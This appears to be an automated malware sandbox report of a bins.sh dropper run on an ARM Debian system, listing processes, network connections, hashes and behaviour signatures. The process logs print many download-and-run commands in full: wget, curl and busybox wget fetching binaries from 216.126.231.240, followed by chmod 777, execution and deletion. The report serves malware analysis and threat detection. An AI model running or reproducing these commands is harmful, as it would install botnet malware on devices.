/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/chmod
[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/rm
[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/wget
[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/chmod
[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/rm
[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 151.101.193.91:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 89.187.167.3:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-20 02:59
Reported
2024-11-20 03:02
Platform
debian9-armhf-20240418-en
Max time kernel
41s
Max time network
43s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | N/A |
| N/A | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | N/A |
| N/A | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | N/A |
| N/A | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | N/A |
| N/A | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | N/A |
| N/A | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | N/A |
| N/A | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | N/A |
| N/A | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | N/A |
| N/A | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | N/A |
| N/A | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | N/A |
| N/A | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | N/A |
| N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | N/A |
| N/A | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | N/A |
| N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /usr/bin/curl | N/A |
Processes
/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh
[/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/chmod
[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/rm
[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/wget
[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/chmod
[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/rm
[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/wget
[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/chmod
[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/rm
[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/wget
[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/chmod
[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/rm
[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/wget
[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/chmod
[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/rm
[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/wget
[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/chmod
[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/rm
[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/wget
[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/chmod
[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/rm
[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/wget
[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/chmod
[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/rm
[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/wget
[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/chmod
[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/rm
[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/wget
[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/chmod
[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/rm
[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/chmod
[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/rm
[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/wget
[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/chmod
[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/rm
[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/wget
[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/chmod
[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/rm
[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/wget
[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/chmod
[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/rm
[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/wget
[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/chmod
[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/rm
[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/wget
[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/chmod
[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/rm
[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/wget
[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
